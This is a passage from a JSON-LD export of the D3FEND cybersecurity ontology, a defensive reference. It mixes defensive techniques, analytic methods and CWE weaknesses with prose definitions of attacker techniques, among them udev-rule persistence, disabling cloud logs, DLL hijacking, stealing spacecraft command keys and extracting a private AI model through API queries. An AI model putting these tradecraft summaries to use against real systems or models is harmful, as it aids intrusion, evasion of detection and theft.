        "d3f:URL"
      ],
      "rdfs:label": "Web Socket URL"
    },
    {
      "@id": "d3f:K-CenterClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KCC",
      "d3f:definition": "K-center Clustering is a type of clustering based on an combinatorial optimization methods.  It clusters a set of points so as to minimize the maximum intercluster distance.",
      "d3f:kb-article": "## How it works\n\nAn example K-center Clustering problem is to mimimize the number of points in a set that are necessary so that a every other point in the set is within some fixed distance of those points.  For instance, given n cities with specified distances, one wants to build k warehouses in different cities and minimize the maximum distance of a city to a warehouse.\n\n## Considerations\n\n- **Scalability**: Exact solutions are NP-hard.  However, algorithms\n    that have been proven effective and create no more than 2x the\n    optimal set of clusters can run in O(kn) proportional to k*n where\n    k is the minimum number of clusters and n is the number of data\n    points being clustered.\n\n## Key Test Considerations\n\n- **Unsupervised Learning**:\n\n  - **Number of Clusters**: The Gonzalez (Gon) algorithm guarantees\n      creating no more than twice the optimal number of clusters,\n      where the optimal number is the minimum number of clusters to\n      minimize total distance between representative points in the\n      clusters [1].\n\n- **Cluster Analysis**:\n\n    - **Rand Index and Adjusted Rand Index**: Given ground truth set\n      of class labels for the data, the Rand Index is a measure of the\n      similarity between two data clusterings. The Rand Index is the\n      accuracy of determining if a link belongs within a cluster or\n      not. A form of the Rand Index may be defined that is adjusted\n      for the chance grouping of elements, this is the Adjusted Rand\n      Index [5].\n\n    - **Adjusted Mutual Information**: Given ground truth set of class\n      labels for the data, Adjusted Mutual Information corrects the\n      effect of agreement solely due to chance between clusterings,\n      similar to the way the Adjusted Rand Index corrects the Rand\n      Index [6].\n\n- **Connection-based Clustering**:\n\n  - **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan).\n\n  - **Sensitivity**: Connection-based method can be sensitive to outliers, which might affect the quality of the clusters formed.\n\n- **K-center Clustering**:\n\n  - **Silhouette Score**: The silhouette score refers to a scoring\n    method that helps validate the consistency between clusters of\n    data. The evaluation technique also produces a concise graphical\n    representation of how well each object appear to have been\n    classified.  It is suited to K-centric Clustering in that it also\n    works for different metric spaces.\n\n  - **Distance Metric**: The distance measure must be a true metric (see\n    [2]).  Differences in the metric chosen may (e.g., Euclidean,a\n    Manhattan) affect results significantly.\n\n  - **Sensitivity**: Greedy implementations may be sensitive to\n    outliers.\n\n## Platforms, Tools, or Libraries\n\nN/A. _Note that this algorithm is relatively simple and so it is\nusually implemented from scratch by those incorporating this algorithm\ninto a system._\n\n## References\n\n1. Gonzalez, T.F. (1985). Clustering to Minimize the Maximum Intercluster Distance. Theor. Comput. Sci., 38, 293-306.\n[Link](https://www.sciencedirect.com/science/article/pii/0304397585902245?via%3Dihub).\n\n1. Weisstein, Eric W. (n.d.). \"Metric.\" From MathWorld--A Wolfram Web Resource. [Link](https://mathworld.wolfram.com/Metric.html).\n\n1. Wikipedia. (8 Aug 2023). Metric k-center [Link](https://en.wikipedia.org/wiki/Metric_k-center).\n\n1. Wikipedia. (14 Aug 2023). Vertex k-center problem. [Link](https://en.wikipedia.org/wiki/Vertex_k-center_problem).\n\n1. Wikipedia. (n.d.). Rand Index. [Link](https://en.wikipedia.org/wiki/Rand_index).\n\n1. Wikipedia. (n.d.). Adjusted Mutual Information. [Link](https://en.wikipedia.org/wiki/Adjusted_mutual_information).\n\n1. Wikipedia. (1 Aug 2023). Silhouette (clustering). [Link](https://en.wikipedia.org/wiki/Silhouette_(clustering)).",
      "rdfs:label": "K-Center Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Graph-basedClustering"
      }
    },
    {
      "@id": "d3f:T0825",
      "@type": "owl:Class",
      "d3f:attack-id": "T0825",
      "d3f:definition": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Location Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Location Identification"
    },
    {
      "@id": "d3f:ARMA_Model",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TimeSeriesAnalysis"
      ],
      "d3f:d3fend-id": "D3-ARMA",
      "d3f:definition": "Autoregressive-moving-average (ARMA) models provide a parsimonious description of a (weakly) stationary stochastic process in terms of two polynomials, one for the autoregression (AR) and the second for the moving average (MA).",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive-moving-average model. [Link](https://en.wikipedia.org/wiki/Autoregressive%E2%80%93moving-average_model)",
      "d3f:synonym": "Autoregressive moving average model",
      "rdfs:label": "ARMA Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeySetSecurityEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the application or modification of access controls or security settings to a registry key.",
      "rdfs:label": "Windows Registry Key Set Security Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nfa4612b8fd3d4c70acfe8d37ad0507c5"
        }
      ]
    },
    {
      "@id": "_:Nfa4612b8fd3d4c70acfe8d37ad0507c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:SecurityToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Security tokens are peripheral devices used to prove one's identity electronically (as in the case of a customer trying to access their bank account). The token is used in addition to or in place of a password to prove that the customer is who they claim to be. The token acts like an electronic key to access something.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Security_token"
      },
      "rdfs:label": "Security Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N705ed5f8e594419c89d11a3c875deb6b"
        }
      ]
    },
    {
      "@id": "_:N705ed5f8e594419c89d11a3c875deb6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:T1564.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.009",
      "d3f:definition": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)",
      "d3f:may-create": {
        "@id": "d3f:ResourceFork"
      },
      "d3f:may-modify": {
        "@id": "d3f:ResourceFork"
      },
      "rdfs:label": "Resource Forking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N6dd68be8eb284517826f1df5b01de4f4"
        },
        {
          "@id": "_:N24ca9562c57d4714b72cbadf6ac843fe"
        }
      ]
    },
    {
      "@id": "_:N6dd68be8eb284517826f1df5b01de4f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceFork"
      }
    },
    {
      "@id": "_:N24ca9562c57d4714b72cbadf6ac843fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceFork"
      }
    },
    {
      "@id": "d3f:T1138",
      "@type": "owl:Class",
      "d3f:attack-id": "T1138",
      "d3f:definition": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.011",
      "rdfs:label": "Application Shimming",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-754",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-754",
      "d3f:definition": "The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.",
      "rdfs:label": "Improper Check for Unusual or Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:CWE-1068",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1068",
      "d3f:definition": "The implementation of the product is not consistent with the design as described within the relevant documentation.",
      "rdfs:label": "Inconsistency Between Implementation and Documented Design",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1059.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.001",
      "d3f:definition": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).",
      "rdfs:label": "PowerShell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:AML.T0024.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.002",
      "d3f:definition": "Adversaries may extract a functional copy of a private model.\nBy repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.\nThe inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.\n\nAdversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting.\nModel extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).",
      "rdfs:label": "Extract AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Extract AI Model"
    },
    {
      "@id": "d3f:CWE-688",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-688",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Variable or Reference as Argument",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1562.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.008",
      "d3f:definition": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.",
      "d3f:disables": {
        "@id": "d3f:CloudServiceSensor"
      },
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Disable or Modify Cloud Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nf0f610a1df754f2bae19e6436b0a3ed1"
        },
        {
          "@id": "_:Nf4e126eb7b1a4608a07fb83866f70f39"
        }
      ]
    },
    {
      "@id": "_:Nf0f610a1df754f2bae19e6436b0a3ed1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceSensor"
      }
    },
    {
      "@id": "_:Nf4e126eb7b1a4608a07fb83866f70f39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-175",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-175",
      "d3f:definition": "The product does not properly handle when the same input uses several different (mixed) encodings.",
      "rdfs:label": "Improper Handling of Mixed Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:T1038",
      "@type": "owl:Class",
      "d3f:attack-id": "T1038",
      "d3f:definition": "Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.001",
      "rdfs:label": "DLL Search Order Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:RemoteAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits systems without being physically present near the target, often over the internet.",
      "rdfs:label": "Remote Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:Generation",
      "@type": "owl:Class",
      "rdfs:label": "Media Generation",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:RD-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003.02",
      "d3f:definition": "Adversaries seek any cryptographic material that confers command or decryption authority: uplink authentication/MAC keys and counters, link-encryption/session keys and KEKs, loading/transfer keys for HSMs, PN/spreading codes, modem credentials, and station or crosslink keys. Acquisition routes include compromised ground systems and laptops, misconfigured repositories and ticket systems, memory/core dumps, training datasets and screenshots, contractor support channels, and poorly controlled key-loading or recovery procedures. Because some missions authenticate uplink without encrypting it, possession of the right keys/counters may be sufficient to inject accepted commands outside official channels or to desynchronize anti-replay.",
      "rdfs:label": "Cryptographic Keys - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0003"
      },
      "skos:prefLabel": "Cryptographic Keys"
    },
    {
      "@id": "d3f:LinuxProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "Linux Process"
    },
    {
      "@id": "d3f:ProximitySensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A sensor able to detect the presence of nearby objects without any physical contact.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Proximity_sensor"
      },
      "rdfs:label": "Proximity Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        }
      ]
    },
    {
      "@id": "d3f:FileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:File"
      },
      "d3f:d3fend-id": "D3-FA",
      "d3f:definition": "File Analysis is an analytic process to determine a file's status. For example: virus, trojan, benign, malicious, trusted, unauthorized, sensitive, etc.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\nSome techniques use file signatures or file metadata to compare against historical collections of malware. Files may also be compared against a source of ground truth such as cryptographic signatures. Examining files for potential malware using pattern matching against file contents/file behavior. Binary code may be dissembled and analyzed for predictive malware behavior, such as API call signatures. Analysis might occur within a protected environment such as a sandbox or live system.",
      "rdfs:label": "File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N1343dc21a4094602a2fe82064c45eaf6"
        },
        {
          "@id": "_:N2f520b3df08140c68a03116fb5fd47a0"
        }
      ]
    },
    {
      "@id": "_:N1343dc21a4094602a2fe82064c45eaf6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N2f520b3df08140c68a03116fb5fd47a0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:CCI-000193_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of lower case characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000193"
    },
    {
      "@id": "d3f:Reference-FirmwareVerificationTrapezoid",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9674183B2/en"
      },
      "d3f:kb-abstract": "A trust control management method for security, operable on a computer system generates a unique Trust ID value by combining user-defined values with hardware-specific values associated with the user's computer system and storing the Trust ID value in a memory register physically associated with the hardware of the computer system.",
      "d3f:kb-author": "Michael J. Dyer, Jose E. Gonzalez, Albert Caballero",
      "d3f:kb-organization": "Trapezoid, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "System and method for hardware-based trust control management",
      "rdfs:label": "Reference - Firmware Verification Trapezoid"
    },
    {
      "@id": "d3f:OTAlarmMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Report danger, hazards, or serious errors.",
      "rdfs:label": "OT Alarm Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N11498a6a7ed5457eacb8cd1806170caa"
        }
      ]
    },
    {
      "@id": "_:N11498a6a7ed5457eacb8cd1806170caa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTAlarmMessage"
      }
    },
    {
      "@id": "d3f:T1546.017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.017",
      "d3f:definition": "Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)",
      "rdfs:label": "Udev Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:T1035",
      "@type": "owl:Class",
      "d3f:attack-id": "T1035",
      "d3f:definition": "Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1569.002",
      "rdfs:label": "Service Execution",
      "rdfs:seeAlso": {
        "@id": "d3f:T1569.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-386",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-386",
      "d3f:definition": "A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time.",
      "rdfs:label": "Symbolic Name not Mapping to Correct Object",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:CWE-1089",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1089",
      "d3f:definition": "The product uses a large data table that contains an excessively large number of indices.",
      "rdfs:label": "Large Data Table with Excessive Number of Indices",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CWE-521",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-521",
      "d3f:definition": "The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.",
      "rdfs:label": "Weak Password Requirements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1391"
      }
    },
    {
      "@id": "d3f:RD-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003",
      "d3f:definition": "Adversaries acquire ready-made tools, code, and knowledge so they can move faster and with lower attribution when operations begin. Capabilities span commodity malware and loaders, bespoke implants for mission control mission control and ground enclaves, privilege-escalation and lateral-movement kits, SDR/codec stacks for TT&C and payload links, fuzzers and protocol harnesses, exploit chains for RTOS/middleware and ground services, and databases of configuration playbooks from prior intrusions. Actors prefer modular kits that can be re-skinned (new C2, new certs) and exercised in flatsat or SIL/HIL labs before use. They also collect operational “how-tos”, procedures, scripts, and operator macros, that convert technical access into mission effects.",
      "rdfs:label": "Obtain Cyber Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Cyber Capabilities"
    },
    {
      "@id": "d3f:encrypts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x encrypts y: The entity x converts the ordinary representation of a digital artifact y into a secret code.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00996121-v"
      },
      "rdfs:label": "encrypts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:Reference-PredictingDomainGenerationAlgorithmsWithLongShort-TermMemoryNetworks_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://arxiv.org/abs/1611.007911"
      },
      "d3f:kb-abstract": "Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generating a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate---a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results.",
      "d3f:kb-author": "Jonathan Woodbridge, Hyrum S. Anderson, Anjum Ahuja, Daniel Grant",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks",
      "rdfs:label": "Reference - Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"
    },
    {
      "@id": "d3f:invoked-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x invoked-by y: The entity x is called, triggered, or activated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:invokes"
      },
      "rdfs:label": "invoked-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-invoked-by"
        }
      ]
    },
    {
      "@id": "d3f:BusMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital message potentially containing commands, telemetry, or status signals, encoded in a bus protocol and conveyed over a bus within one or more frames.",
      "rdfs:label": "Bus Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:CCI-000032_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control using organization-defined security policy filters as a basis for flow control decisions for organization-defined information flows.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000032"
    },
    {
      "@id": "d3f:WebSessionAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:WebSessionAccessMediation"
      ],
      "d3f:d3fend-id": "D3-WSAM",
      "d3f:definition": "Web session access mediation secures user sessions in web applications by employing robust authentication and integrity validation, along with adaptive threat mitigation techniques, to ensure that access to web resources is authorized and protected from session-related attacks.",
      "d3f:isolates": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "d3f:kb-article": "## How it works\n\nWeb Session Access Mediation involves managing user access to web applications and services, ensuring secure and authorized sessions. This includes authenticating users, maintaining session integrity, and protecting against threats like session hijacking. Examples include accessing corporate intranets, SaaS applications, or online portals.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1"
      },
      "rdfs:label": "Web Session Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "_:N80a179cd0a9f41f68b3c12c87410cd85"
        }
      ]
    },
    {
      "@id": "_:N80a179cd0a9f41f68b3c12c87410cd85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "d3f:PacketLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of all the network packet data captured from a network by a network sensor (i.e., packet analyzer),",
      "d3f:records": {
        "@id": "d3f:NetworkSession"
      },
      "d3f:summarizes": {
        "@id": "d3f:PacketCaptureFile"
      },
      "rdfs:label": "Packet Log",
      "rdfs:seeAlso": {
        "@id": "dbr:Packet_analyzer"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Log"
        },
        {
          "@id": "_:N16bc33f5882b4548aa24841386200a81"
        },
        {
          "@id": "_:Nafbcdede022640c1a95b436ba4aa62b9"
        }
      ]
    },
    {
      "@id": "_:N16bc33f5882b4548aa24841386200a81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "_:Nafbcdede022640c1a95b436ba4aa62b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:summarizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PacketCaptureFile"
      }
    },
    {
      "@id": "d3f:Variance",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VAR",
      "d3f:definition": "Variance is a measure of dispersion, meaning it is a measure of how far a set of numbers is spread out from their average value.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Variance. [Link](https://en.wikipedia.org/wiki/Variance)",
      "rdfs:label": "Variance",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:WindowsShortcutFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Microsoft Windows shortcut file.",
      "rdfs:label": "Windows Shortcut File",
      "rdfs:seeAlso": [
        {
          "@id": "http://dbpedia.org/resource/Shortcut_(computing)#Microsoft_Windows"
        },
